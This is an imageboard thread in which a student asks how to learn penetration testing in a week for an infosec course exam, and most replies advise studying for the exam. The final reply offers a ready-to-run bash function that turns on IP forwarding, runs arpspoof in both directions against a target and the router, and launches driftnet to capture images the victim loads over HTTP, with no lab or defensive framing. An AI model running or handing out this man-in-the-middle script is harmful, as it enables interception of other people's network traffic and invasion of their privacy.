藤原純一 · 2018-01-20 10:47
How do I master pentesting in a week? My current infosec course is pretty sparse and dry when it comes to teaching, the only thing they give are slides, no textbooks with proper explanations.

Why do you need it done in a week?

>>3743 You want to pass an exam you need to figure out what questions will be asked and study only for that. We're not psychic so I'm not sure what help you expected sorry.

>>3747 I was thinking there might be a book covering pentesting in a week but I can't seem to find one.

>>3749 You can spend a lifetime learning about any topic. If you only have 1 week you need to focus on learning what will be on the exam.

i feel generous today install arpspoof and drifnet with your package manager and you will be able to see pictures your target fetches in HTTP mitm() { # perform a mitm attack # # $ mitm &inteface &targetip &routerip # if [[ $(whoami) != "root" ]];then printf "you must be root to run this function\n" else echo 1 > /proc/sys/net/ipv4/ip_forward xterm -e "arpspoof -i $1 -t $2 $3" & xterm -e "arpspoof -i $1 -t $3 $2" & xterm -e "driftnet -i $1" & read -p "hit RET to stop the attack" echo 0 > /proc/sys/net/ipv4/ip_forward killall arpspoof fi }
